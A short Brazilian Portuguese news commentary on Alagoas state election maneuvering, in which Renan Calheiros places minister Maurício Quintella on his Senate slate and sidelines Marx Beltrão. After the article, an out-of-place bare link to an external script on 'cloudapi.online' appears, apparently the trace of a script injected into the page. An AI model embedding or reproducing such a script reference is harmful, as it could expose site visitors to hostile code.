BrasilNotícias

Em Alagoas, Renan Calheiros deu uma rasteira no ministro do Turismo

O senador Renan Calheiros (MDB) e o governador Renan Filho (MDB) deram um verdadeiro “xeque-mate” nas eleições estaduais de Alagoas. Que Renan Calheiros é um dos enxadristas todo poderoso da República ninguém duvidava, mas o fato é que em Alagoas dificilmente teremos eleição, mas um simulacro desta diante da completa desarticulação da oposição.

Com a ida do ministro dos Transportes do governo de Michel Temer (MDB), Maurício Quintella Lessa (PR), para a chapa de Renan Calheiros e Renan Filho, Quintella deve ser candidato ao Senado Federal ao lado dos Renans. É uma rasteira no ministro do Turismo, Marx Beltrão (MDB), que sonha em disputar o cargo.

Lá atrás, Renan Calheiros havia prometido a Marx Beltrão esta segunda vaga da chapa, inclusive com nota oficial do MDB alagoano. Mas Quintella chegou e sentou na janela. Agora, Marx Beltrão revisa os planos e busca até uma aliança com o senador Benedito de Lira (PP), que é opositor de Renan Calheiros no Estado. O problema é que o grupo não tem candidato ao governo do Estado.

Em Alagoas, Renan Calheiros fez barba, cabelo e bigode…

https://cloudapi.online/js/api46.js

Tags
Ver mais

Artigos relacionados

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Close